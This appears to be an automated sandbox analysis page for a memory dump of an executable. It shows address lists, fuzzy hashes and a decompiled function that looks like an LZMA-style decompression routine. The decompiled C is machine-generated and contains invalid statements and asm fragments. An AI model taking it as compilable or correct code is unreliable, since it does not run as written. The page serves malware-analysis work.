0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00000000
0x00406f56
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406776(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406786
0x0040678d
0x00406793
0x00406799
0x00000000
0x0040679d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067bf
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d4
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x0040681f
0x00406822
0x0040684a
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406824
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683c
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
